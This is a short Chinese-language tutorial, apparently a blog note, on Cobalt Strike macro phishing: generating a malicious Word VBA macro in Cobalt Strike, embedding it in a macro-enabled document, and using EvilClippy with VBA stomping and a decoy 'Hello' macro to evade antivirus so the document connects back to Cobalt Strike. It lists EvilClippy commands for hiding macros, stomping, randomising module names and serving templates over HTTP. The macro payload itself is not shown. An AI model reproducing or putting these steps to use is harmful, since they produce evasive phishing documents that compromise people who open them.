CS宏钓鱼

CS

 

生成cs的vba脚本

攻击-钓鱼后门-ms office macro

generate之后

 

这是生成的宏脚本

 

在office中打开word，视图-宏-查看宏，创建宏

在this document中清除全部内容并复制cs生成的宏代码

 

 

 

保存成“启用宏的文件”

生成的宏文件可以被杀毒软件杀掉。

 

通过EvilClippy进行免杀

先安装mono

brew install mono

mono --version

再安装EvilClippy    

https://github.com/outflanknl/EvilClippy

2.vba

Sub Hello()
Dim X
X=MsgBox("Hello VBS")

#进行混淆
csc/reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll/out:EvilClippy.exe *.cs
mono EvilClippy.exe -s 2.vba 1.doc

　此时生成1_EvilClippy.doc就是免杀的宏文件，免杀上线cs

 

工具使用

显示帮助信息

EvilClippy.exe –h

在GUI中隐藏宏

EvilClippy.exe -g macrofile.doc

VBA Stomp（P-Code伪编码）

EvilClippy.exe -s fakecode.vba macrofile.doc

为VBA Stomping设置目标Office版本信息

EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

设置随机模块名（混淆安全分析工具）

EvilClippy.exe -r macrofile.doc

通过HTTP提供VBA Stomp模板；

EvilClippy.exe -s fakecode.vba -w 8080 macrofile.dot

设置远程VBA项目锁定保护

EvilClippy.exe -u macrofile.doc

解除保护：

EvilClippy.exe -uu macrofile.doc



大佬链接：
https://www.yisu.com/zixun/498707.html
https://blog.csdn.net/jd_cx/article/details/119380386?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-119380386-blog-116266931.t0_eslanding_v1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-119380386-blog-116266931.t0_eslanding_v1&utm_relevant_index=1
https://www.bbsmax.com/A/QV5Zn46n5y/
https://cloud.tencent.com/developer/article/1846893